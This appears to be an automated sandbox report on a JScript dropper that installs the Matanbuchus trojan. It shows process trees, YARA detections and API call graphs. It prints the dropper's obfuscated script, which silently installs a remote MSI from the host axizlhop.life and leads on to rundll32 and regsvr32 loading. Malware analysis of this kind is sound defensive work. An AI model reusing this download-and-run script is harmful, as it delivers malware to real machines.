                                            2024-12-06 21:13:13 UTC16384INData Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42
                                            Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:16:11:01
                                            Start date:06/12/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js"
                                            Imagebase:0x7ff756c60000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:1
                                            Start time:16:11:01
                                            Start date:06/12/2024
                                            Path:C:\Windows\System32\msiexec.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\msiexec.exe /V
                                            Imagebase:0x7ff77ea80000
                                            File size:69'632 bytes
                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:3
                                            Start time:16:11:06
                                            Start date:06/12/2024
                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding A3003A09105FCE67A0C91E88C1FC90DC
                                            Imagebase:0xc90000
                                            File size:59'904 bytes
                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:16:11:06
                                            Start date:06/12/2024
                                            Path:C:\Windows\System32\rundll32.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                                            Imagebase:0x7ff6a2a40000
                                            File size:71'680 bytes
                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:5
                                            Start time:16:11:06
                                            Start date:06/12/2024
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                                            Imagebase:0x460000
                                            File size:61'440 bytes
                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000005.00000002.3322347292.0000000004930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:false

                                            Target ID:6
                                            Start time:16:11:11
                                            Start date:06/12/2024
                                            Path:C:\Windows\System32\regsvr32.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
                                            Imagebase:0x7ff6a62f0000
                                            File size:25'088 bytes
                                            MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:16:11:11
                                            Start date:06/12/2024
                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                            Wow64 process (32bit):true
                                            Commandline: -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
                                            Imagebase:0xe30000
                                            File size:20'992 bytes
                                            MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000007.00000002.2414164418.0000000005753000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000007.00000002.2414164418.0000000005753000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:true

                                            Target ID:10
                                            Start time:16:12:10
                                            Start date:06/12/2024
                                            Path:C:\Windows\System32\regsvr32.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
                                            Imagebase:0x7ff6a62f0000
                                            File size:25'088 bytes
                                            MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:11
                                            Start time:16:12:10
                                            Start date:06/12/2024
                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                            Wow64 process (32bit):true
                                            Commandline: -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
                                            Imagebase:0xe30000
                                            File size:20'992 bytes
                                            MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000B.00000002.2937064236.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000B.00000002.2937064236.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:true

                                            Call Graph

                                            • Executed
                                            • Not Executed
                                            callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C2 E1C0 entry:C0 F3C2 E1C0->F3C2 F5C4 ActiveXObject("WindowsInstaller.Installer") F7C6 properties

                                            Script:

                                            Code
                                            0
                                            ( function () {
                                            • () ➔ undefined
                                            • () ➔ undefined
                                            1
                                            var a = new ActiveXObject ( "WindowsInst\aller.Installer" );
                                              2
                                              var properties = {
                                                3
                                                uiLevel : "UIL\ev\el"
                                                  4
                                                  };
                                                    5
                                                    a[properties.uiLevel] = 2;
                                                      6
                                                      var methods = [ "in\sta\llpro\duct" ];
                                                        7
                                                        a[methods[0]] ( "http\s:/\/axizlhop.life/klog.php" );
                                                        • installproduct("https://axizlhop.life/klog.php") ➔ undefined
                                                        8
                                                        } ) ( );
                                                          9
                                                          {
                                                            10
                                                            "9949";
                                                              11
                                                              }
                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:9.3%
                                                                  Dynamic/Decrypted Code Coverage:97.9%
                                                                  Signature Coverage:40%
                                                                  Total number of Nodes:1614
                                                                  Total number of Limit Nodes:15
                                                                  execution_graph 45248 7fb40da5 45249 7fb40db0 45248->45249 45250 7fb40de3 45248->45250 45252 7fb40dd5 45249->45252 45253 7fb40db5 45249->45253 45276 7fb40eff 87 API calls 4 library calls 45250->45276 45260 7fb40df8 45252->45260 45255 7fb40dba 45253->45255 45256 7fb40dcb 45253->45256 45259 7fb40dbf 45255->45259 45274 7fb408f5 21 API calls 45255->45274 45275 7fb408d6 23 API calls 45256->45275 45261 7fb40e04 __FrameHandler3::FrameUnwindToState 45260->45261 45277 7fb40966 11 API calls ___scrt_uninitialize_crt 45261->45277 45263 7fb40e0b __DllMainCRTStartup@12 45264 7fb40ef7 45263->45264 45265 7fb40e32 45263->45265 45271 7fb40e6e ___scrt_is_nonwritable_in_current_image std::locale::_Setgloballocale 45263->45271 45281 7fb41417 4 API calls 2 library calls 45264->45281 45278 7fb408c8 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 45265->45278 45268 7fb40efe 45269 7fb40e41 __RTC_Initialize 45269->45271 45279 7fb415cc InitializeSListHead 45269->45279 45271->45259 45272 7fb40e4f 45272->45271 45280 7fb4089d IsProcessorFeaturePresent ___scrt_release_startup_lock 45272->45280 45274->45259 45275->45259 45276->45259 45277->45263 45278->45269 45279->45272 45280->45271 45281->45268 45282 7fb410e5 45283 7fb410f3 45282->45283 45284 7fb410ee 45282->45284 45288 7fb40faf 45283->45288 45304 7fb41581 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 45284->45304 45289 7fb40fbb __FrameHandler3::FrameUnwindToState 45288->45289 45290 7fb40fe4 dllmain_raw 45289->45290 45291 7fb40fca 45289->45291 45292 7fb40fdf 45289->45292 45290->45291 45293 7fb40ffe dllmain_crt_dispatch 45290->45293 45305 7fb3c5a0 IsCharLowerA GetModuleFileNameW __DllMainCRTStartup@12 45292->45305 45293->45291 45293->45292 45295 7fb4101f 45296 7fb41050 45295->45296 45306 7fb3c5a0 IsCharLowerA GetModuleFileNameW __DllMainCRTStartup@12 45295->45306 45296->45291 45297 7fb41059 dllmain_crt_dispatch 45296->45297 45297->45291 45298 7fb4106c dllmain_raw 45297->45298 45300 7fb4109e 45298->45300 45300->45291 45301 7fb41037 45307 7fb40eff 87 API calls 4 library calls 45301->45307 45303 7fb41045 dllmain_raw 45303->45296 45304->45283 45305->45295 45306->45301 45307->45303 45308 6c31ed90 45311 6c33d860 45308->45311 45312 6c33d88a 45311->45312 45328 6c33d120 45312->45328 45317 6c33dc0e 45319 6c33e432 45317->45319 45348 6c33d210 StrCmpIW 45317->45348 45349 6c33d180 StrCmpIW 45319->45349 45321 6c31edc1 45324 6c33d150 StrCmpIW 45326 6c33d897 45324->45326 45325 6c33d0f0 StrCmpIW 45325->45326 45326->45317 45326->45321 45326->45324 45326->45325 45327 6c33d240 StrCmpIW 45326->45327 45332 6c33d1e0 45326->45332 45336 6c33d1b0 45326->45336 45340 6c33d0c0 45326->45340 45344 6c33d270 45326->45344 45327->45326 45329 6c33d13e 45328->45329 45330 6c33d12c 45328->45330 45329->45326 45350 6c33e660 StrCmpIW 45330->45350 45333 6c33d1fe CoInitializeSecurity 45332->45333 45334 6c33d1ec 45332->45334 45333->45326 45351 6c33e660 StrCmpIW 45334->45351 45337 6c33d1bc 45336->45337 45339 6c33d1ce 45336->45339 45352 6c33e660 StrCmpIW 45337->45352 45339->45326 45341 6c33d0de 45340->45341 45342 6c33d0cc 45340->45342 45341->45326 45353 6c33e660 StrCmpIW 45342->45353 45345 6c33d27c 45344->45345 45347 6c33d28e 45344->45347 45354 6c33e660 StrCmpIW 45345->45354 45347->45326 45348->45319 45349->45321 45350->45329 45351->45333 45352->45339 45353->45341 45354->45347 45355 7fb3caf0 GetSystemDirectoryW 45385 7fb28840 45355->45385 45357 7fb3cd96 __DllMainCRTStartup@12 45358 7fb28840 3 API calls 45357->45358 45359 7fb3e441 __DllMainCRTStartup@12 45357->45359 45363 7fb3d293 __DllMainCRTStartup@12 45358->45363 45361 7fb3d7f0 45362 7fb3e44b 45361->45362 45365 7fb3d7f8 __DllMainCRTStartup@12 45361->45365 45364 7fb28840 3 API calls 45362->45364 45368 7fb3e45f swprintf 45362->45368 45363->45359 45388 7fb13740 45363->45388 45364->45368 45367 7fb3d8cb GetTempFileNameW 45365->45367 45366 7fb3e5e3 lstrlenW 45366->45368 45370 7fb3d94e GetCurrentDirectoryA 45367->45370 45368->45359 45368->45366 45371 7fb3da30 45370->45371 45371->45359 45372 7fb3db93 GetTempFileNameA 45371->45372 45374 7fb3dbf7 __DllMainCRTStartup@12 swprintf 45372->45374 45373 7fb3de9e GetPEB 45375 7fb3df01 45373->45375 45374->45373 45404 7fb077a0 45375->45404 45377 7fb3e11e 45378 7fb3e125 ExitProcess 45377->45378 45379 7fb3e12d GetPEB 45377->45379 45383 7fb3e1e8 CreateThread 45379->45383 45412 7faf1e40 45383->45412 45429 7fb09830 IsCharLowerA 45383->45429 45417 7fb29280 45385->45417 45387 7fb28a4e __DllMainCRTStartup@12 45387->45357 45389 7fb13986 45388->45389 45390 7fb139eb GetPEB 45389->45390 45391 7fb13a7d 45390->45391 45392 7fb13d1a GetPEB 45391->45392 45393 7fb13dac GetPEB 45392->45393 45396 7fb14023 GetPEB 45393->45396 45398 7fb143de PathIsDirectoryW 45396->45398 45402 7fb145b9 45398->45402 45403 7fb148d1 __DllMainCRTStartup@12 45398->45403 45399 7fb147db LoadLibraryExA 45400 7fb14857 45399->45400 45401 7fb29280 3 API calls 45400->45401 45400->45403 45401->45403 45402->45399 45403->45361 45405 7fb07a3f CreateMutexA 45404->45405 45407 7fb079a6 45404->45407 45406 7fb07b44 GetLastError 45405->45406 45410 7fb07a5a __DllMainCRTStartup@12 45405->45410 45408 7fb07b55 __DllMainCRTStartup@12 45406->45408 45406->45410 45407->45405 45409 7fb07be4 CloseHandle 45408->45409 45409->45410 45410->45377 45413 7faf1e4c 45412->45413 45414 7faf1e5e 45412->45414 45428 7fb2ed70 GetPEB 45413->45428 45416 7faf20b0 GetPEB 45414->45416 45416->45359 45422 7fb295f0 45417->45422 45420 7fb29497 GetShellWindow 45421 7fb294a1 __DllMainCRTStartup@12 45420->45421 45421->45387 45423 7fb29817 GetProcessHeap 45422->45423 45425 7fb2988d 45423->45425 45426 7fb298fe GetDriveTypeA 45425->45426 45427 7fb29483 45425->45427 45426->45427 45427->45420 45427->45421 45428->45414 45430 7fb29280 3 API calls 45429->45430 45433 7fb09aa8 45430->45433 45431 7fb28840 3 API calls 45439 7fb09dcc 45431->45439 45434 7fb29280 3 API calls 45433->45434 45443 7fb09c77 45433->45443 45434->45443 45436 7fb09fbd __DllMainCRTStartup@12 45502 7fb326f0 45436->45502 45499 7fb3ee28 45439->45499 45443->45431 45443->45439 45446 7faf63a0 std::ios_base::clear 26 API calls 45447 7fb0a11b 45446->45447 45448 7faf63a0 std::ios_base::clear 26 API calls 45447->45448 45449 7fb0a13c 45448->45449 45450 7faf63a0 std::ios_base::clear 26 API calls 45449->45450 45451 7fb0a15d 45450->45451 45583 7fb2c4a0 45451->45583 45454 7faf63a0 std::ios_base::clear 26 API calls 45455 7fb0a194 45454->45455 45456 7faf63a0 std::ios_base::clear 26 API calls 45455->45456 45457 7fb0a1b5 45456->45457 45702 7fb27660 45457->45702 45459 7fb0d319 45953 7faf9250 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45459->45953 45461 7fb0d32f 45954 7faf9b00 11 API calls std::ios_base::clear 45461->45954 45463 7fb0d33e 45955 7faf9a30 11 API calls std::ios_base::clear 45463->45955 45465 7fb0d350 45466 7fb0a363 GetEnvironmentVariableW 45476 7fb0a1c2 __DllMainCRTStartup@12 45466->45476 45471 7faed1f0 26 API calls 45471->45476 45476->45459 45476->45466 45476->45471 45477 7fb0d308 Sleep 45476->45477 45480 7fb17680 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45476->45480 45481 7fb13200 80 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45476->45481 45483 7fb2c4a0 81 API calls 45476->45483 45484 7fb30c00 138 API calls 45476->45484 45486 7fae45d0 81 API calls 45476->45486 45489 7faf63a0 26 API calls std::ios_base::clear 45476->45489 45491 7faf9250 81 API calls 45476->45491 45492 7fae42c0 81 API calls 45476->45492 45497 7fae4760 26 API calls 45476->45497 45917 7fae44e0 45476->45917 45924 7faf67d0 45476->45924 45928 7faf9d60 45476->45928 45937 7fb1a800 52 API calls 2 library calls 45476->45937 45938 7fb1c160 52 API calls 2 library calls 45476->45938 45939 7fb1dac0 55 API calls 4 library calls 45476->45939 45940 7fb1fd40 55 API calls 2 library calls 45476->45940 45941 7fb21eb0 52 API calls 2 library calls 45476->45941 45942 7fb37d90 15 API calls 2 library calls 45476->45942 45943 7fb38870 15 API calls 2 library calls 45476->45943 45944 7fb0d6c0 32 API calls std::ios_base::clear 45476->45944 45945 7fb0d370 32 API calls std::ios_base::clear 45476->45945 45946 7fb0e250 32 API calls std::ios_base::clear 45476->45946 45947 7fb06a50 37 API calls std::ios_base::clear 45476->45947 45948 7fb068a0 42 API calls std::ios_base::clear 45476->45948 45949 7fb0da10 44 API calls 2 library calls 45476->45949 45950 7fb0e0d0 34 API calls std::ios_base::clear 45476->45950 45951 7fb07510 GetPEB 45476->45951 45952 7faf92e0 11 API calls std::ios_base::clear 45476->45952 45477->45476 45480->45476 45481->45476 45483->45476 45484->45476 45486->45476 45489->45476 45491->45476 45492->45476 45497->45476 45956 7fb3f610 GetPEB 45499->45956 45501 7fb3ee33 45501->45436 45503 7fb32725 45502->45503 45958 7fae5360 45503->45958 45505 7fb32777 45964 7faf7700 45505->45964 45507 7fb327af 45508 7fae5360 numpunct 26 API calls 45507->45508 45509 7fb32854 45508->45509 45509->45509 45510 7fae5360 numpunct 26 API calls 45509->45510 45511 7fb328be 45510->45511 45512 7fae5360 numpunct 26 API calls 45511->45512 45513 7fb32933 45512->45513 45513->45513 45514 7fae5360 numpunct 26 API calls 45513->45514 45515 7fb329ad 45514->45515 45516 7faf7680 26 API calls 45515->45516 45517 7fb329cd 45516->45517 45518 7faf7680 26 API calls 45517->45518 45519 7fb329e8 45518->45519 45520 7faf63a0 std::ios_base::clear 26 API calls 45519->45520 45521 7fb32a10 45520->45521 45522 7faf63a0 std::ios_base::clear 26 API calls 45521->45522 45523 7fb32a31 45522->45523 45524 7faf63a0 std::ios_base::clear 26 API calls 45523->45524 45525 7fb32a52 45524->45525 45526 7faf63a0 std::ios_base::clear 26 API calls 45525->45526 45527 7fb32a73 45526->45527 45967 7faf7e60 45527->45967 45531 7fb32a9d 46005 7fb120f0 45531->46005 45533 7fb32aac 45534 7fb120f0 std::ios_base::clear 11 API calls 45533->45534 45535 7fb32abb 45534->45535 45536 7fb120f0 std::ios_base::clear 11 API calls 45535->45536 45537 7fb32aca 45536->45537 45538 7fb120f0 std::ios_base::clear 11 API calls 45537->45538 45539 7fb32ad9 45538->45539 45540 7fb11d30 11 API calls 45539->45540 45541 7fb0a088 45540->45541 45542 7faf7680 45541->45542 46096 7fae5a20 45542->46096 45545 7faf8480 45546 7faf84b8 45545->45546 46114 7fb0e900 45546->46114 45549 7faf7680 26 API calls 45550 7faf861e 45549->45550 46117 7fb2e3a0 45550->46117 45564 7faf865a 46211 7fb2af60 45564->46211 45568 7faf866a 46226 7fb2e690 GetPEB 45568->46226 45575 7fb11d30 11 API calls 45576 7faf868e 45575->45576 45577 7fb11d30 11 API calls 45576->45577 45578 7faf869d GetTempPathW 45577->45578 45579 7faf63a0 45578->45579 45580 7faf641c 45579->45580 46363 7fae5490 45580->46363 45582 7faf6461 45582->45446 46371 7fae3160 45583->46371 45586 7fae3160 81 API calls 45587 7fb2c512 45586->45587 46376 7faf5f50 45587->46376 45590 7fae3160 81 API calls 45591 7fb2c5a3 45590->45591 46397 7fae31c0 45591->46397 45594 7faf5f50 81 API calls 45595 7fb2c633 45594->45595 45596 7fae3160 81 API calls 45595->45596 45597 7fb2c660 45596->45597 45598 7fae31c0 81 API calls 45597->45598 45599 7fb2c68c 45598->45599 45600 7faf5f50 81 API calls 45599->45600 45601 7fb2c6f0 45600->45601 45602 7fae3160 81 API calls 45601->45602 45603 7fb2c71d 45602->45603 45604 7fae31c0 81 API calls 45603->45604 45605 7fb2c749 45604->45605 45606 7faf5f50 81 API calls 45605->45606 45607 7fb2c7ad 45606->45607 45608 7fae3160 81 API calls 45607->45608 45609 7fb2c7da 45608->45609 45610 7fae31c0 81 API calls 45609->45610 45611 7fb2c806 45610->45611 45612 7faf5f50 81 API calls 45611->45612 45613 7fb2c86a 45612->45613 45614 7fae3160 81 API calls 45613->45614 45615 7fb2c897 45614->45615 45616 7fae31c0 81 API calls 45615->45616 45617 7fb2c8c6 45616->45617 45618 7faf5f50 81 API calls 45617->45618 45619 7fb2c92a 45618->45619 45620 7fae3160 81 API calls 45619->45620 45621 7fb2c957 45620->45621 45622 7fae31c0 81 API calls 45621->45622 45623 7fb2c986 45622->45623 45624 7faf5f50 81 API calls 45623->45624 45625 7fb2c9ea 45624->45625 45626 7fae3160 81 API calls 45625->45626 45627 7fb2ca17 45626->45627 45628 7fae31c0 81 API calls 45627->45628 45629 7fb2ca46 45628->45629 45630 7faf5f50 81 API calls 45629->45630 45631 7fb2caaa 45630->45631 45632 7fae3160 81 API calls 45631->45632 45633 7fb2cad7 45632->45633 45634 7fae31c0 81 API calls 45633->45634 45635 7fb2cb06 45634->45635 45636 7faf5f50 81 API calls 45635->45636 45637 7fb2cb6a 45636->45637 45638 7fae3160 81 API calls 45637->45638 45639 7fb2cb97 45638->45639 45640 7fae31c0 81 API calls 45639->45640 45641 7fb2cbc6 45640->45641 45642 7faf5f50 81 API calls 45641->45642 45643 7fb2cc2a 45642->45643 45644 7fae3160 81 API calls 45643->45644 45645 7fb2cc57 45644->45645 45646 7fae31c0 81 API calls 45645->45646 45647 7fb2cc89 45646->45647 45648 7faf5f50 81 API calls 45647->45648 45649 7fb2cced 45648->45649 45650 7fae3160 81 API calls 45649->45650 45651 7fb2cd1a 45650->45651 46402 7fae9610 45651->46402 45656 7faf5f50 81 API calls 45657 7fb2cddf 45656->45657 45658 7fae3160 81 API calls 45657->45658 45659 7fb2ce0c 45658->45659 45660 7fae31c0 81 API calls 45659->45660 45661 7fb2ce44 45660->45661 45662 7faf5f50 81 API calls 45661->45662 45663 7fb2cea8 45662->45663 45664 7fae3160 81 API calls 45663->45664 45665 7fb2cedb 45664->45665 45666 7fae9610 26 API calls 45665->45666 45667 7fb2cf14 45666->45667 45668 7fae3b50 81 API calls 45667->45668 45669 7fb2cf4e 45668->45669 45670 7faf5f50 81 API calls 45669->45670 45671 7fb2cfb2 45670->45671 45672 7fae3160 81 API calls 45671->45672 45673 7fb2cfe5 45672->45673 45674 7fae31c0 81 API calls 45673->45674 45675 7fb2d01d 45674->45675 45676 7faf5f50 81 API calls 45675->45676 45677 7fb2d081 45676->45677 45678 7fae3160 81 API calls 45677->45678 45679 7fb2d0b4 45678->45679 46411 7fae3220 45679->46411 45682 7faf5f50 81 API calls 45683 7fb2d150 45682->45683 45684 7faf5f50 81 API calls 45683->45684 45685 7fb2d19c 45684->45685 45686 7fb120f0 std::ios_base::clear 11 API calls 45685->45686 45687 7fb2d20f 45686->45687 45688 7fb120f0 std::ios_base::clear 11 API calls 45687->45688 45689 7fb2d250 45688->45689 46416 7faf5d30 45689->46416 45696 7fb120f0 std::ios_base::clear 11 API calls 45697 7fb2d3a9 45696->45697 45698 7fb120f0 std::ios_base::clear 11 API calls 45697->45698 45699 7fb2d3b5 45698->45699 45700 7fb120f0 std::ios_base::clear 11 API calls 45699->45700 45701 7fb0a173 45700->45701 45701->45454 45703 7fb276a3 45702->45703 46606 7fb136a0 45703->46606 45710 7fb27740 46887 7fb309b0 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45710->46887 45711 7fb27868 45712 7fb120f0 std::ios_base::clear 11 API calls 45711->45712 45714 7fb27877 45712->45714 45715 7fb120f0 std::ios_base::clear 11 API calls 45714->45715 45716 7fb27882 45715->45716 45719 7fb120f0 std::ios_base::clear 11 API calls 45716->45719 45717 7fb27863 45717->45476 45718 7fb27758 45718->45717 45720 7faf63a0 std::ios_base::clear 26 API calls 45718->45720 45721 7fb27891 45719->45721 45722 7fb27780 45720->45722 45723 7fb120f0 std::ios_base::clear 11 API calls 45721->45723 46888 7fafacc0 81 API calls 3 library calls 45722->46888 45725 7fb2789c 45723->45725 46632 7fae45d0 45725->46632 45726 7fb27792 46889 7faed1f0 45726->46889 45730 7fb278bd 45733 7fb279e2 45730->45733 45734 7fb278cd 45730->45734 45732 7fb277da std::ios_base::clear 45738 7fb25ec0 4 API calls 45732->45738 46657 7fb239c0 45733->46657 45736 7faf63a0 std::ios_base::clear 26 API calls 45734->45736 45737 7fb278e1 45736->45737 45740 7fae45d0 81 API calls 45737->45740 45741 7fb2780d 45738->45741 45739 7fb279f9 std::ios_base::clear 46672 7fb25ec0 GetPEB 45739->46672 45742 7fb2790e 45740->45742 45743 7fae3160 81 API calls 45741->45743 46909 7fafa670 81 API calls 3 library calls 45742->46909 45744 7fb2782d 45743->45744 46908 7fafacc0 81 API calls 3 library calls 45744->46908 45748 7fb27915 45750 7faed1f0 26 API calls 45748->45750 45749 7fb2783f 45751 7faf9d60 81 API calls 45749->45751 45752 7fb2792d 45750->45752 45753 7fb27854 45751->45753 45755 7fb15a00 26 API calls 45752->45755 45756 7fb120f0 std::ios_base::clear 11 API calls 45753->45756 45754 7fb27a2c 45754->45754 45758 7fae5360 numpunct 26 API calls 45754->45758 45757 7fb2794c std::ios_base::clear 45755->45757 45756->45717 45761 7fb25ec0 4 API calls 45757->45761 45759 7fb27aa7 45758->45759 45760 7fb120f0 std::ios_base::clear 11 API calls 45759->45760 45762 7fb27ab6 45760->45762 45763 7fb2797f 45761->45763 46676 7fae48d0 45762->46676 45765 7fae3160 81 API calls 45763->45765 45767 7fb2799f 45765->45767 45769 7fae45d0 81 API calls 45767->45769 45770 7fb279bc 45769->45770 46910 7fafa670 81 API calls 3 library calls 45770->46910 45771 7fb27aeb 45773 7fb120f0 std::ios_base::clear 11 API calls 45771->45773 45774 7fb27af6 45773->45774 45776 7faf63a0 std::ios_base::clear 26 API calls 45774->45776 45775 7fb279c3 45777 7faf9d60 81 API calls 45775->45777 45778 7fb27b0d 45776->45778 45779 7fb279ce 45777->45779 45780 7faf63a0 std::ios_base::clear 26 API calls 45778->45780 45781 7fb120f0 std::ios_base::clear 11 API calls 45779->45781 45782 7fb27b2b 45780->45782 45783 7fb279dd 45781->45783 45784 7faf63a0 std::ios_base::clear 26 API calls 45782->45784 45783->45476 45785 7fb27b49 45784->45785 46686 7fb34390 45785->46686 45787 7fb27bc5 45788 7faf63a0 std::ios_base::clear 26 API calls 45787->45788 45789 7fb27bdc 45788->45789 45790 7faf63a0 std::ios_base::clear 26 API calls 45789->45790 45793 7fb27bfa 45790->45793 45791 7fb27b59 std::ios_base::clear 45791->45787 